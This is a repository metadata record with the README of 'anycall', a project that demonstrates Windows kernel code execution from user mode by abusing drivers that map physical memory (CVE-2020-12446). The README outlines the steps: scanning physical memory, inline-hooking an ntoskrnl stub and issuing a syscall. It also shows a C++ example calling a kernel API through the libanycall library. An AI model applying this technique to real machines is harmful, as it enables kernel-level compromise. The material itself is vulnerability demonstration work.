{"id":16551767,"url":"https://github.com/kkent030315/anycall","last_synced_at":"2025-04-09T13:03:48.468Z","repository":{"id":52678709,"uuid":"367226901","full_name":"kkent030315/anycall","owner":"kkent030315","description":"x64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration","archived":false,"fork":false,"pushed_at":"2022-07-06T17:17:52.000Z","size":894,"stargazers_count":311,"open_issues_count":3,"forks_count":65,"subscribers_count":7,"default_branch":"main","last_synced_at":"2025-04-02T10:13:42.954Z","etag":null,"topics":["cli","code-execution","device-driver","driver","drivers","kernel","kernel-exploit","kernel-exploitation","kernel-exploits","memory-hacking","smep","smep-bypass","windows","windows-10"],"latest_commit_sha":null,"homepage":"https://www.godeye.club/2021/05/14/001-x64-windows-kernel-code-execution-via-user.html","language":"C++","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/kkent030315.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-05-14T02:22:54.000Z","updated_at":"2025-04-01T22:23:02.000Z","dependencies_parsed_at":"2022-08-13T02:01:20.401Z","dependency_job_id":null,"html_url":"https://github.com/kkent030315/anycall","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kkent030315%2Fanycall","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kkent030315%2Fanycall/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kkent030315%2Fanycall/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kkent030315%2Fanycall/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/kkent030315","download_url":"https://codeload.github.com/kkent030315/anycall/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248045230,"owners_count":21038553,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cli","code-execution","device-driver","driver","drivers","kernel","kernel-exploit","kernel-exploitation","kernel-exploits","memory-hacking","smep","smep-bypass","windows","windows-10"],"created_at":"2024-10-11T19:43:06.745Z","updated_at":"2025-04-09T13:03:48.447Z","avatar_url":"https://github.com/kkent030315.png","language":"C++","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cp align=\"center\"\u003e\n\u003cimg src=\"image.png\"\u003e\n\n\u003cimg src=\"https://img.shields.io/github/workflow/status/kkent030315/anycall/MSBuild?style=for-the-badge\"\u003e\n\u003cimg src=\"https://img.shields.io/github/v/release/kkent030315/anycall?style=for-the-badge\"\u003e\n\u003cimg src=\"https://img.shields.io/badge/platform-win--64-00a2ed?style=for-the-badge\"\u003e\n\u003cimg src=\"https://img.shields.io/codacy/grade/80af226b06214213bc3d2a44c9624222?style=for-the-badge\"\u003e\n\u003cimg src=\"https://img.shields.io/github/license/kkent030315/anycall?style=for-the-badge\"\u003e\n\u003c/p\u003e\n\n# anycall\n\nx64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration\n\nRead: https://www.godeye.club/2021/05/14/001-x64-windows-kernel-code-execution-via-user.html\n\n## How it works\n\n\u003cp align=\"center\"\u003e\n\u003cimg src=\"how.png\"\u003e\n\u003c/p\u003e\n\n1. Allocate physical memory to user virtual memory\n\t- Allows user-process to manupulate arbitrary physical memory without calling APIs\n2. Search entire physical memory until we found function stub to hook, in `ntoskrnl.exe` physical memory\n3. Once the stub found, place inline-hook on the stub\n\t- simply `jmp rax`, detour address could be anything we want to invoke\n4. `syscall` it\n5. wow, we are `user-mode` but able to call kernel APIs\n\n## Goal of this project\n\nThis project is to demonstrate how drivers that allowing user-process to map physical memory for user, and how it is critical vulnerable.\n\nRelated CVEs:\n\n- [CVE-2020-12446](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12446)\n\n## libanycall\n\n`libanycall` is the powerful c++ static-library that makes exploit execution of ``anycall`` more easily.\n\n### Usage\n\n1. link it (e.g, `#pragma comment( lib, \"libanycall64\" )`)\n2. include (e.g, `#include \"libanycall.h\"`)\n\nFor example:\n\n```cpp\n#include \u003cwindows.h\u003e\n#include \u003ciostream\u003e\n\n#include \"libanycall.h\"\n\n#pragma comment( lib, \"libanycall64\" )\n\nusing PsGetCurrentProcessId = HANDLE( __fastcall* )( void );\n\nint main( const int argc, const char** argv, const char** envp )\n{\n    if ( !libanycall::init( \"ntdll.dll\", \"NtTraceControl\" ) )\n    {\n        printf( \"[!] failed to init libanycall\\n\" );\n        return EXIT_FAILURE;\n    }\n    \n    // invoke NT kernel APIs from usermode\n    const uint32_t process_id =\n        ( uint32_t )ANYCALL_INVOKE( PsGetCurrentProcessId );\n\n    printf( \"PsGetCurrentProcessId returns %d\\n\", process_id );\n\n    return EXIT_SUCCESS;\n}\n```\n\n## License\n\nMIT\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkkent030315%2Fanycall","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fkkent030315%2Fanycall","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkkent030315%2Fanycall/lists"}